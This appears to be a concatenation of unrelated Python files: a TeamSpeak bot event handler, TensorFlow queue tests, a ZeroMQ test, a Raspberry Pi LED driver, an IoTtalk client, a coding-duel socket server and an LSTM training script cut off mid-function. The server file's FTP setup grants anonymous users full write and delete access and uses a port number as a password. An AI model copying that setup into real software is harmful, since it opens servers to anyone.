formatter = logging.Formatter('Eventhandler Logger %(asctime)s %(message)s')
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
logger.info("Configured Eventhandler logger")
logger.propagate = False
def __init__(self, ts3conn, command_handler):
self.ts3conn = ts3conn
self.command_handler = command_handler
self.observers = {}
self.add_observer(self.command_handler.inform, Events.TextMessageEvent)
def on_event(self, sender, **kw):
"""
Called upon a new event. Logs the event and informs all listeners.
"""
# parsed_event = Events.EventParser.parse_event(event=event)
parsed_event = kw["event"]
if type(parsed_event) is Events.TextMessageEvent:
logging.debug(type(parsed_event))
elif type(parsed_event) is Events.ChannelEditedEvent:
logging.debug(type(parsed_event))
elif type(parsed_event) is Events.ChannelDescriptionEditedEvent:
logging.debug(type(parsed_event))
elif type(parsed_event) is Events.ClientEnteredEvent:
logging.debug(type(parsed_event))
elif isinstance(parsed_event, Events.ClientLeftEvent):
logging.debug(type(parsed_event))
elif type(parsed_event) is Events.ClientMovedEvent:
logging.debug(type(parsed_event))
elif type(parsed_event) is Events.ClientMovedSelfEvent:
logging.debug(type(parsed_event))
elif type(parsed_event) is Events.ServerEditedEvent:
logging.debug("Event of type " + str(type(parsed_event)))
logging.debug(parsed_event.changed_properties)
# Inform all observers
self.inform_all(parsed_event)
def get_obs_for_event(self, evt):
"""
Get all observers for an event.
:param evt: Event to get observers for.
:return: List of observers.
:rtype: list[function]
"""
obs = set()
for t in type(evt).mro():
obs.update(self.observers.get(t, set()))
return obs
def add_observer(self, obs, evt_type):
"""
Add an observer for an event type.
:param obs: Function to call upon a new event of type evt_type.
:param evt_type: Event type to observe.
:type evt_type: TS3Event
"""
obs_set = self.observers.get(evt_type, set())
obs_set.add(obs)
self.observers[evt_type] = obs_set
def remove_observer(self, obs, evt_type):
"""
Remove an observer for an event type.
:param obs: Observer to remove.
:param evt_type: Event type to remove the observer from.
"""
self.observers.get(evt_type, set()).discard(obs)
def remove_observer_from_all(self, obs):
"""
Removes an observer from all event_types.
:param obs: Observer to remove.
"""
for evt_type in self.observers.keys():
self.remove_observer(obs, evt_type)
def inform_all(self, evt):
"""
Inform all observers registered to the event type of an event.
:param evt: Event to inform observers of.
"""
for o in self.get_obs_for_event(evt):
try:
threading.Thread(target=o, args=(evt,)).start()
except Exception:
EventHandler.logger.exception("Exception while informing " + str(o) + " of Event of type " +
str(type(evt)) + "\nOriginal data:" + str(evt.data))
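# Hedged usage sketch (not part of the original module): "my_ts3conn" and
# "my_command_handler" are hypothetical stand-ins for the bot's connection and
# command handler objects.
#
#     handler = EventHandler(my_ts3conn, my_command_handler)
#     handler.add_observer(lambda evt: print("client left:", evt),
#                          Events.ClientLeftEvent)
#     # later, for each parsed event coming from the server:
#     handler.on_event(sender=None, event=parsed_event)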
|
client_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for client.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import platform
import sys
import threading
import time
from tensorflow.python.distribute.client import client
from tensorflow.python.eager import cancellation
from tensorflow.python.eager import def_function
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import coordinator
from tensorflow.python.util import nest
class CoordinatedClosureQueueTest(test.TestCase):
def testBasic(self):
queue = client._CoordinatedClosureQueue()
closure1 = self._create_closure(queue._cancellation_mgr)
queue.put(closure1)
self.assertIs(closure1, queue.get())
self.assertFalse(queue.done())
queue.put_back(closure1)
self.assertEqual(closure1, queue.get())
queue.mark_finished()
self.assertTrue(queue.done())
queue.wait()
def testProcessAtLeastOnce(self):
closure_queue = client._CoordinatedClosureQueue()
labels = ['A', 'B', 'C', 'D', 'E']
processed_count = collections.defaultdict(int)
coord = coordinator.Coordinator(clean_stop_exception_types=[])
def process_queue():
with coord.stop_on_exception():
has_been_put_back = False
while True:
closure = closure_queue.get(timeout=30)
if closure is None:
break
if not has_been_put_back:
has_been_put_back = True
closure_queue.put_back(closure)
continue
closure._function()
closure_queue.mark_finished()
def get_func(label):
def func():
time.sleep(3)
processed_count[label] += 1
return func
cm = cancellation.CancellationManager()
for label in labels:
closure_queue.put(client.Closure(get_func(label), cm))
t1 = threading.Thread(target=process_queue, daemon=True)
t1.start()
t2 = threading.Thread(target=process_queue, daemon=True)
t2.start()
# Make sure multiple wait() calls are fine.
closure_queue.wait()
closure_queue.wait()
closure_queue.wait()
closure_queue.wait()
self.assertEqual(processed_count, collections.Counter(labels))
coord.join([t1, t2])
def testNotifyBeforeWait(self):
closure_queue = client._CoordinatedClosureQueue()
def func():
logging.info('func running')
coord = coordinator.Coordinator(clean_stop_exception_types=[])
def process_queue():
with coord.stop_on_exception():
closure_queue.get()
closure_queue.mark_finished()
closure_queue.put(client.Closure(func, closure_queue._cancellation_mgr))
t = threading.Thread(target=process_queue)
t.start()
coord.join([t])
# This test asserts that waiting at the time the function has been processed
# doesn't time out.
closure_queue.wait()
def _assert_one_unblock_the_other(self, first_fn, second_fn):
"""Asserts `second_fn` wouldn't return before `first_fn` is finished."""
first_fn_done = threading.Event()
second_fn_done = threading.Event()
coord = coordinator.Coordinator(clean_stop_exception_types=[])
def wrapped_first_fn():
with coord.stop_on_exception():
self.assertFalse(second_fn_done.is_set())
first_fn()
first_fn_done.set()
self.assertFalse(first_fn_done.is_set())
t = threading.Thread(target=wrapped_first_fn)
t.start()
second_fn()
self.assertTrue(first_fn_done.is_set())
second_fn_done.set()
coord.join([t])
def testWaitRaiseErrorAfterMarkFailure(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue = client._CoordinatedClosureQueue()
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
closure = closure_queue.get()
wait_finish_event = threading.Event()
coord = coordinator.Coordinator(clean_stop_exception_types=[])
# Using a thread to verify that closure_queue.wait() will not return until
# all inflight closures are finished.
def mark_finished_fn():
try:
raise ValueError('Some error.')
except ValueError as e:
closure_queue.mark_failed(e)
def wait_fn():
with self.assertRaises(ValueError):
closure_queue.wait()
self._assert_one_unblock_the_other(mark_finished_fn, wait_fn)
self.assertTrue(closure_queue.done())
def _create_closure(self, cancellation_mgr):
@def_function.function()
def some_function():
return 1.0
return client.Closure(some_function, cancellation_mgr)
def _put_two_closures_and_get_one(self):
closure_queue = client._CoordinatedClosureQueue()
closure1 = self._create_closure(closure_queue._cancellation_mgr)
closure_queue.put(closure1)
closure2 = self._create_closure(closure_queue._cancellation_mgr)
closure_queue.put(closure2)
closure_got = closure_queue.get() # returns closure1
self.assertIs(closure_got, closure1)
self.assertIsNot(closure_got, closure2)
return closure_queue, closure1, closure2
def testPutRaiseError(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, closure2 = self._put_two_closures_and_get_one()
closure_queue.mark_failed(ValueError())
with self.assertRaises(ValueError):
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
self.assertTrue(closure_queue.done())
with self.assertRaisesRegex(
client.FunctionRetryableError,
'The corresponding function is cancelled. Please reschedule the '
'function.'):
closure2._fetch_output_remote_values()
# The error is cleared.
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
def testWaitRaiseError(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, closure2 = self._put_two_closures_and_get_one()
closure_queue.mark_failed(ValueError())
with self.assertRaises(ValueError):
closure_queue.wait()
self.assertTrue(closure_queue.done())
with self.assertRaisesRegex(
client.FunctionRetryableError,
'The corresponding function is cancelled. Please reschedule the '
'function.'):
closure2._fetch_output_remote_values()
# The error is cleared.
closure_queue.wait()
def testDoneRaiseError(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, _ = self._put_two_closures_and_get_one()
self.assertFalse(closure_queue.done())
closure_queue.mark_failed(ValueError())
with self.assertRaises(ValueError):
closure_queue.done()
def _set_error(self, closure_queue, closure, error):
try:
raise error
except Exception as e: # pylint: disable=broad-except
nest.map_structure(lambda x: x._set_error(e),
closure._output_remote_values)
closure_queue.mark_failed(e)
def _test_cancel_closure_when_error(self, call_wait):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, closure1, closure2 = self._put_two_closures_and_get_one()
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
closure_queue.get()
# At this moment, there are two inflight, one in queue.
self.assertEqual(closure_queue._inflight_closure_count, 2)
# Hold a copy of the queue's cancellation manager at this point
initial_cm = closure_queue._cancellation_mgr
# Simulating closure1 fails.
self._set_error(closure_queue, closure1, ValueError('Some error.'))
# At this moment, there are one inflight, one in queue.
self.assertEqual(closure_queue._queue.qsize(), 1)
self.assertEqual(closure_queue._inflight_closure_count, 1)
closure3 = self._create_closure(closure_queue._cancellation_mgr)
def fake_cancellation():
self._set_error(closure_queue, closure2,
ValueError('Fake cancellation error.'))
def report_error():
# It should not report the fake cancellation error.
with self.assertRaisesRegex(ValueError, 'Some error.'):
# Verifying `wait()` or `put()` raises even if one closure is in
# flight.
if call_wait:
closure_queue.wait()
else:
closure_queue.put(closure3)
self._assert_one_unblock_the_other(fake_cancellation, report_error)
# The original cancellation manager of the queue has been cancelled.
self.assertTrue(initial_cm.is_cancelled)
# At this moment, there is zero inflight, nothing in queue.
self.assertTrue(closure_queue._queue.empty())
self.assertEqual(closure_queue._inflight_closure_count, 0)
self.assertIsNone(closure_queue._error)
# This asserts that closure1 has errored.
with self.assertRaisesRegex(ValueError, 'Some error.'):
closure1._fetch_output_remote_values()
# The following asserts that closure3 should have been cancelled.
if not call_wait:
with self.assertRaisesRegex(
client.FunctionRetryableError,
'The corresponding function is cancelled. Please reschedule the '
'function.'):
closure3._fetch_output_remote_values()
# Closure2 was an inflight closure when it got cancelled.
self.assertEqual(closure2._output_remote_values._status,
client._RemoteValueStatus.READY)
with self.assertRaisesRegex(ValueError, 'Fake cancellation error.'):
closure2._fetch_output_remote_values()
# This asserts that the queue has a clear state.
self.testBasic()
def testWaitRaiseErrorAfterCancelClosure(self):
self._test_cancel_closure_when_error(call_wait=True)
def testPutRaiseErrorAfterCancelClosure(self):
self._test_cancel_closure_when_error(call_wait=False)
def testStateIsRestoredAfterJoinIsCalled(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, _ = self._put_two_closures_and_get_one()
self.assertEqual(closure_queue._inflight_closure_count, 1)
closure_queue.mark_failed(ValueError('test error'))
with self.assertRaises(ValueError):
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
# Its error should have been cleared.
self.assertIsNone(closure_queue._error)
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
self.assertIsNone(closure_queue._error)
def testThreadSafety(self):
thread_count = 10
queue = client._CoordinatedClosureQueue()
# Each thread performs 20 queue actions: 10 are `put_back` and 10 are
# `mark_finished`.
action_count = 20
def func():
for i in range(action_count):
closure = queue.get()
if i % 2 == 0:
queue.put_back(closure)
else:
queue.mark_finished()
threads = [threading.Thread(target=func) for _ in range(thread_count)]
for t in threads:
t.start()
for _ in range(thread_count * action_count // 2):
queue.put(self._create_closure(queue._cancellation_mgr))
queue.wait()
self.assertTrue(queue.done())
if __name__ == '__main__':
test.main()
|
test_RHW.py
|
import zmq
adr = 'tcp://127.0.0.1:6001'
context = zmq.Context()
pub = context.socket(zmq.PUB)
pub.setsockopt_unicode(zmq.IDENTITY, 'publisher')
pub.bind(adr)
sub = context.socket(zmq.SUB)
poller = zmq.Poller()
poller.register(sub, zmq.POLLIN)
sub.setsockopt(zmq.SUBSCRIBE, b"")
sub.set_hwm(1)
#sub.setsockopt(zmq.RCVHWM, 1)
sub.connect(adr)
from threading import Thread
from time import sleep
def send_pub(pub):
i = 0
while True:
i += 1
pub.send_multipart([b'msg', str(i).encode('utf-8')])
print(f'publishing msg_i = {i}')
sleep(0.3)
t = Thread(target=send_pub, args=[pub])
t.start()
n = 0
sleeped = False
while True:
n += 1
print(f'n={n}')
if n > 10 and not sleeped:
sleeped = True
print('sleeping')
sleep(1)
sockets = dict(poller.poll(300))
if sub in sockets:
data = sub.recv_multipart()
print(f'received {data}')
|
_led.py
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""LED driver for the VoiceHat."""
import itertools
import threading
import time
import RPi.GPIO as GPIO
class LED:
"""Starts a background thread to show patterns with the LED.
Simple usage:
my_led = LED(channel = 25)
my_led.start()
my_led.set_state(LED.BEACON)
my_led.stop()
"""
OFF = 0
ON = 1
BLINK = 2
BLINK_3 = 3
BEACON = 4
BEACON_DARK = 5
DECAY = 6
PULSE_SLOW = 7
PULSE_QUICK = 8
def __init__(self, channel):
self.animator = threading.Thread(target=self._animate, daemon=True)
self.channel = channel
self.iterator = None
self.running = False
self.state = None
self.sleep = 0
GPIO.setmode(GPIO.BCM)
GPIO.setup(channel, GPIO.OUT)
self.pwm = GPIO.PWM(channel, 100)
self.lock = threading.Lock()
def __del__(self):
self.stop()
GPIO.cleanup(self.channel)
def start(self):
"""Start the LED driver."""
with self.lock: # pylint: disable=E1129
if not self.running:
self.running = True
self.pwm.start(0) # off by default
self.animator.start()
def stop(self):
"""Stop the LED driver and sets the LED to off."""
with self.lock: # pylint: disable=E1129
if self.running:
self.running = False
self.animator.join()
self.pwm.stop()
def set_state(self, state):
"""Set the LED driver's new state.
Note the LED driver must be started for this to have any effect.
"""
with self.lock: # pylint: disable=E1129
self.state = state
def _animate(self):
while True:
state = None
running = False
with self.lock: # pylint: disable=E1129
state = self.state
self.state = None
running = self.running
if not running:
return
if state:
if not self._parse_state(state):
raise ValueError('unsupported state: %d' % state)
if self.iterator:
self.pwm.ChangeDutyCycle(next(self.iterator))
time.sleep(self.sleep)
else:
# We can also wait for a state change here with a Condition.
time.sleep(1)
def _parse_state(self, state):
self.iterator = None
self.sleep = 0.0
handled = False
if state == self.OFF:
self.pwm.ChangeDutyCycle(0)
handled = True
elif state == self.ON:
self.pwm.ChangeDutyCycle(100)
handled = True
elif state == self.BLINK:
self.iterator = itertools.cycle([0, 100])
self.sleep = 0.5
handled = True
elif state == self.BLINK_3:
self.iterator = itertools.cycle([0, 100] * 3 + [0, 0])
self.sleep = 0.25
handled = True
elif state == self.BEACON:
self.iterator = itertools.cycle(
itertools.chain([30] * 100, [100] * 8, range(100, 30, -5)))
self.sleep = 0.05
handled = True
elif state == self.BEACON_DARK:
self.iterator = itertools.cycle(
itertools.chain([0] * 100, range(0, 30, 3), range(30, 0, -3)))
self.sleep = 0.05
handled = True
elif state == self.DECAY:
self.iterator = itertools.cycle(range(100, 0, -2))
self.sleep = 0.05
handled = True
elif state == self.PULSE_SLOW:
self.iterator = itertools.cycle(
itertools.chain(range(0, 100, 2), range(100, 0, -2)))
self.sleep = 0.1
handled = True
elif state == self.PULSE_QUICK:
self.iterator = itertools.cycle(
itertools.chain(range(0, 100, 5), range(100, 0, -5)))
self.sleep = 0.05
handled = True
return handled
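# Hedged sketch (not part of the original driver): the same itertools idiom used
# in _parse_state can describe extra patterns, e.g. a triangle wave that ramps
# to half brightness and back, which could back an additional state constant.
def _triangle_wave(peak=50, step=5):
    """Return a cycling duty-cycle iterator for a triangle brightness pattern."""
    return itertools.cycle(
        itertools.chain(range(0, peak, step), range(peak, 0, -step)))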
|
DAN.py
|
import requests, time, csmapi, random, threading
# example
profile = {
'd_name': None,
'dm_name': 'MorSensor',
'u_name': 'yb',
'is_sim': False,
'df_list': ['Acceleration', 'Temperature'],
}
mac_addr = 'C860008BD249'
state = 'SUSPEND' #for control channel
#state = 'RESUME'
SelectedDF = []
control_channel_timestamp = None
def ControlChannel():
global state, SelectedDF, control_channel_timestamp
NewSession=requests.Session()
while True:
time.sleep(2)
try:
CH = csmapi.pull(MAC,'__Ctl_O__', NewSession)
if CH != []:
if control_channel_timestamp == CH[0][0]: continue
control_channel_timestamp = CH[0][0]
state = CH[0][1][0]
if state == 'SET_DF_STATUS' :
csmapi.push(MAC,'__Ctl_I__',['SET_DF_STATUS_RSP',{'cmd_params':CH[0][1][1]['cmd_params']}], NewSession)
DF_STATUS = list(CH[0][1][1]['cmd_params'][0])
SelectedDF = []
index=0
for STATUS in DF_STATUS:
if STATUS == '1':
SelectedDF.append(profile['df_list'][index])
index=index+1
except Exception as e:
print ('Control error:', e)
if str(e).find('mac_addr not found:') != -1:
print('Reg_addr is not found. Try to re-register...')
device_registration_with_retry()
else:
print('Connection failed due to unknown reasons.')
time.sleep(1)
def get_mac_addr():
from uuid import getnode
mac = getnode()
mac = ''.join(("%012X" % mac)[i:i+2] for i in range(0, 12, 2))
return mac
def detect_local_ec():
EASYCONNECT_HOST=None
import socket
UDP_IP = ''
UDP_PORT = 17000
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((UDP_IP, UDP_PORT))
while EASYCONNECT_HOST==None:
print ('Searching for the IoTtalk server...')
data, addr = s.recvfrom(1024)
if str(data.decode()) == 'easyconnect':
EASYCONNECT_HOST = 'http://{}:9999'.format(addr[0])
csmapi.ENDPOINT=EASYCONNECT_HOST
#print('IoTtalk server = {}'.format(csmapi.ENDPOINT))
timestamp={}
MAC=get_mac_addr()
thx=None
def register_device(addr):
global MAC, profile, timestamp, thx
if csmapi.ENDPOINT == None: detect_local_ec()
if addr != None: MAC = addr
if profile['d_name'] == None: profile['d_name']= str(int(random.uniform(1, 100)))+'.'+ profile['dm_name']
for i in profile['df_list']: timestamp[i] = ''
print('IoTtalk Server = {}'.format(csmapi.ENDPOINT))
if csmapi.register(MAC,profile):
print ('This device has successfully registered.')
print ('Device name = ' + profile['d_name'])
if thx == None:
print ('Create control threading')
thx=threading.Thread(target=ControlChannel) #for control channel
thx.daemon = True #for control channel
thx.start() #for control channel
return True
else:
print ('Registration failed.')
return False
def device_registration_with_retry(URL=None, addr=None):
if URL != None:
csmapi.ENDPOINT = URL
success = False
while not success:
try:
register_device(addr)
success = True
except Exception as e:
print('Attach failed:', e)
time.sleep(1)
def pull(FEATURE_NAME):
global timestamp
if state == 'RESUME': data = csmapi.pull(MAC,FEATURE_NAME)
else: data = []
if data != []:
if timestamp[FEATURE_NAME] == data[0][0]:
return None
timestamp[FEATURE_NAME] = data[0][0]
if data[0][1] != []:
return data[0][1]
else: return None
else:
return None
def push(FEATURE_NAME, *data):
if state == 'RESUME':
return csmapi.push(MAC, FEATURE_NAME, list(data))
else: return None
def get_alias(FEATURE_NAME):
try:
alias = csmapi.get_alias(MAC,FEATURE_NAME)
except Exception as e:
#print (e)
return None
else:
return alias
def set_alias(FEATURE_NAME, alias):
try:
alias = csmapi.set_alias(MAC, FEATURE_NAME, alias)
except Exception as e:
#print (e)
return None
else:
return alias
def deregister():
return csmapi.deregister(MAC)
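# Hedged usage sketch: feature names come from the example profile at the top of
# this file; the server URL is a hypothetical placeholder. Note that push/pull
# are no-ops until the control channel switches `state` to 'RESUME'.
#
#     device_registration_with_retry('http://iottalk.example.org:9999')
#     push('Temperature', 25.3)
#     acceleration = pull('Acceleration')
#     deregister()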
|
server.py
|
# lsof -n -i4TCP:32757 | grep LISTEN | awk '{ print $2 }' | xargs kill
import socket
from contextlib import suppress
with suppress(Exception):
from Server import runtime
from Server import database
with suppress(Exception):
import runtime
import database
import threading
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
class Server:
def __init__(self, database, client_conn, c_id, specs):
self.c_id = c_id
self.database = database
self.client_conn = client_conn
self.specs = specs
def ftp_service(self):
username = 'ajay'
port = 12345
authorizer = DummyAuthorizer()
authorizer.add_user(username, port, "/users/ajayraj", perm="elradfmw")
authorizer.add_anonymous("/users/ajayraj/", perm="elradfmw")
handler = FTPHandler
handler.authorizer = authorizer
ftp_server = FTPServer(("", 1026), handler)
ftp_server.serve_forever()
def separate_dir_file(self, filepath):
separator = '/'
dir_list = filepath.split(separator)
self.dir = separator.join(dir_list[:-1])
self.file = dir_list[-1]
def client_service(self):
print('TEST')
try:
self.separate_dir_file(self.specs)
src_path = self.database.get_directory_path('src')
test_path = self.database.get_directory_path('test')
filename, extension = self.file.split('.')
p_id = self.database.get_pid(filename)
test_file_names = self.database.get_test_filenames(p_id)
run = runtime.Run_Tests(self.c_id, self.file, src_path, test_path, test_file_names)
test_run_status = run.run_tests()
self.client_conn.send(test_run_status.encode())
duel_id = self.database.get_duel_id(self.c_id)
print('\n\n')
print('Duel ID:', duel_id)
print('Contestant ID:', self.c_id)
print('Test Run:', test_run_status)
print('\n\n')
except TypeError as te:
print('WRONG FILE TYPE | c_id:', self.c_id)
with suppress(Exception):
self.client_conn.send('FILE TYPE NOT SUPPORTED'.encode())
except Exception as e:
print(e)
print('EXCEPTION RAISED WHILE RUNNING TESTS | c_id:', self.c_id)
with suppress(Exception):
self.client_conn.send('UNEXPECTED ERROR. CONTACT ADMIN'.encode())
def duel_scores(self):
print('SCORE', self.c_id)
try:
opponent_id = self.database.get_opponent_id(self.c_id)
contestant_name = self.database.get_contestant_name(self.c_id)
opponent_name = self.database.get_contestant_name(opponent_id)
contestant_score = 0 if self.database.get_score(self.c_id) is None else self.database.get_score(self.c_id)
opponent_score = 0 if self.database.get_score(opponent_id) is None else self.database.get_score(opponent_id)
message = contestant_name + ' -> ' + str(contestant_score) + '\n' + opponent_name + ' -> ' + str(opponent_score)
self.client_conn.send(message.encode())
except Exception as e:
print(e)
print('ERROR IN RETRIEVING SCORES', self.c_id)
def validate_login(self):
print('LOGIN', self.c_id)
try:
if self.database.validate_login(self.c_id, self.specs):
message = 'success'
else:
message = 'fail'
self.client_conn.send(message.encode())
print(message)
except Exception as e:
print(e)
print('EXCEPTION RAISED IN LOGIN')
def __del__(self):
with suppress(Exception):
self.client_conn.close()
hostname, port = '', 32757
server = socket.socket()
server.bind((hostname, port))
server.listen(10)
ftp_server = Server(None, None, None, None)
ftp_service_thread = threading.Thread(target=ftp_server.ftp_service)
ftp_service_thread.start()
while True:
conn, addr = server.accept()
received_message = conn.recv(port).decode()
try:
action, c_id, specs = received_message.split(',')
codeduel_db = database.CodeDuel_Database()
server_interface = Server(codeduel_db, conn, c_id, specs)
if action == 'score':
duel_scores_thread = threading.Thread(target=server_interface.duel_scores)
duel_scores_thread.start()
elif action == 'test':
client_service_thread = threading.Thread(target=server_interface.client_service)
client_service_thread.start()
elif action == 'validate':
validate_thread = threading.Thread(target=server_interface.validate_login)
validate_thread.start()
    except Exception:
conn.close()
|
learn.py
|
#!/usr/bin/env python3
import os, sys
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'lib'))
from support import Database, Config
import numpy as np
import queue, math, socket, subprocess, support, threading
import tensorflow as tf
class Learn:
def __init__(self, config):
graph = tf.Graph()
with graph.as_default():
model = Model(config)
with tf.variable_scope('optimization'):
epoch = tf.Variable(0, name='epoch', trainable=False)
increment_epoch = epoch.assign_add(1)
parameters = tf.trainable_variables()
gradient = tf.gradients(model.loss, parameters)
gradient, _ = tf.clip_by_global_norm(gradient, config.gradient_clip)
optimizer = tf.train.AdamOptimizer(config.learning_rate)
train = optimizer.apply_gradients(zip(gradient, parameters))
with tf.variable_scope('summary'):
tf.scalar_summary('log_loss', tf.log(tf.reduce_sum(model.loss)))
logger = tf.train.SummaryWriter(config.log_path, graph)
summary = tf.merge_all_summaries()
initialize = tf.initialize_variables(tf.all_variables(), name='initialize')
saver = Saver(config)
self.graph = graph
self.model = model
self.epoch = epoch
self.increment_epoch = increment_epoch
self.parameters = parameters
self.train = train
self.logger = logger
self.summary = summary
self.initialize = initialize
self.saver = saver
def count_parameters(self):
return np.sum([int(np.prod(parameter.get_shape())) for parameter in self.parameters])
def run(self, target, monitor, config):
print('Parameters: %d' % self.count_parameters())
print('Samples: %d' % target.sample_count)
session = tf.Session(graph=self.graph)
session.run(self.initialize)
self.saver.restore(session)
epoch = session.run(self.epoch)
epoch_count = config.epoch_count - epoch % config.epoch_count
for e in range(epoch, epoch + epoch_count):
self._run_epoch(target, monitor, config, session, e)
assert(session.run(self.increment_epoch) == e + 1)
self.saver.save(session)
def _run_epoch(self, target, monitor, config, session, e):
for s in range(target.sample_count):
t = e*target.sample_count + s
if monitor.should_train(t):
self._run_train(target, monitor, config, session, e, s, t)
if monitor.should_predict(t):
self._run_predict(target, monitor, config, session, e, s, t)
def _run_train(self, target, monitor, config, session, e, s, t):
sample = target.compute(s)
feed = {
self.model.start: self._zero_start(),
self.model.x: np.reshape(sample, [1, -1, target.dimension_count]),
self.model.y: np.reshape(support.shift(sample, -1), [1, -1, target.dimension_count]),
}
fetch = {'train': self.train, 'loss': self.model.loss, 'summary': self.summary}
result = session.run(fetch, feed)
loss = result['loss'].flatten()
assert(np.all([not math.isnan(loss) for loss in loss]))
monitor.train((e, s, t), loss)
self.logger.add_summary(result['summary'], t)
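    # Free-running prediction: feed the ground-truth prefix sample[:i + 1], then repeatedly
    # feed the model its own last output to roll out the remaining steps, handing each
    # rollout to the monitor for streaming to connected clients.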
def _run_predict(self, target, monitor, config, session, e, s, t):
sample = target.compute((s + 1) % target.sample_count)
step_count = sample.shape[0]
feed = {self.model.start: self._zero_start()}
fetch = {'y_hat': self.model.y_hat, 'finish': self.model.finish}
for i in range(step_count):
feed[self.model.x] = np.reshape(sample[:(i + 1), :], [1, i + 1, -1])
y_hat = np.zeros([step_count, target.dimension_count])
for j in range(step_count - i - 1):
result = session.run(fetch, feed)
feed[self.model.start] = result['finish']
y_hat[j, :] = result['y_hat'][-1, :]
feed[self.model.x] = np.reshape(y_hat[j, :], [1, 1, -1])
if not monitor.predict(support.shift(sample, -i - 1), y_hat):
break
def _zero_start(self):
return np.zeros(self.model.start.get_shape(), np.float32)
class Model:
def __init__(self, config):
x = tf.placeholder(tf.float32, [1, None, config.dimension_count], name='x')
y = tf.placeholder(tf.float32, [1, None, config.dimension_count], name='y')
with tf.variable_scope('network') as scope:
cell = tf.nn.rnn_cell.LSTMCell(config.unit_count,
state_is_tuple=True,
cell_clip=config.cell_clip,
forget_bias=config.forget_bias,
use_peepholes=config.use_peepholes,
initializer=config.network_initializer)
cell = tf.nn.rnn_cell.MultiRNNCell([cell] * config.layer_count, state_is_tuple=True)
start, state = Model._initialize(config)
h, state = tf.nn.dynamic_rnn(cell, x, initial_state=state, parallel_iterations=1)
finish = Model._finalize(state, config)
y_hat, loss = Model._regress(h, y, config)
self.x = x
self.y = y
self.y_hat = y_hat
self.loss = loss
self.start = start
self.finish = finish
def _finalize(state, config):
parts = []
for i in range(config.layer_count):
parts.append(state[i].c)
parts.append(state[i].h)
return tf.pack(parts, name='finish')
def _initialize(config):
start = tf.placeholder(tf.float32, [2 * config.layer_count, 1, config.unit_count],
name='start')
parts = tf.unpack(start)
state = []
for i in range(config.layer_count):
c, h = parts[2 * i], parts[2*i + 1]
state.append(tf.nn.rnn_cell.LSTMStateTuple(c, h))
return start, tuple(state)
def _regress(x, y, config):
with tf.variable_scope('regression') as scope:
unroll_count = tf.shape(x)[1]
x = tf.squeeze(x, squeeze_dims=[0])
y = tf.squeeze(y, squeeze_dims=[0])
w = tf.get_variable('w', [config.unit_count, config.dimension_count],
initializer=config.regression_initializer)
b = tf.get_variable('b', [1, config.dimension_count])
y_hat = tf.matmul(x, w) + tf.tile(b, [unroll_count, 1])
loss = tf.reduce_mean(tf.squared_difference(y_hat, y))
return y_hat, loss
class Monitor:
def __init__(self, config):
self.bind_address = config.bind_address
self.work_schedule = np.cumsum(config.work_schedule)
self.channels = {}
self.lock = threading.Lock()
threading.Thread(target=self._predict_server, daemon=True).start()
def should_train(self, t):
return True
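    # The work schedule alternates training and prediction phases: work_schedule holds the
    # cumulative sum of config.work_schedule (e.g. [990, 1000] for [1000 - 10, 10]), and a
    # global step t falls into the prediction phase only when t modulo the cycle length
    # lands in an odd-indexed segment and at least one client is connected.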
def should_predict(self, t):
return (len(self.channels) > 0 and
np.nonzero(self.work_schedule >= (t % self.work_schedule[-1]))[0][0] % 2 == 1)
def train(self, progress, loss):
sys.stdout.write('%4d %10d %10d' % progress)
[sys.stdout.write(' %12.4e' % loss) for loss in loss]
sys.stdout.write('\n')
def predict(self, y, y_hat):
self.lock.acquire()
try:
for channel in self.channels:
channel.put((y, y_hat))
finally:
self.lock.release()
return len(self.channels) > 0
def _predict_client(self, connection, address):
print('Start serving {}.'.format(address))
channel = queue.Queue()
self.lock.acquire()
try:
self.channels[channel] = True
finally:
self.lock.release()
try:
client = connection.makefile(mode="w")
while True:
y, y_hat = channel.get()
client.write(','.join([str(value) for value in y.flatten()]) + ',')
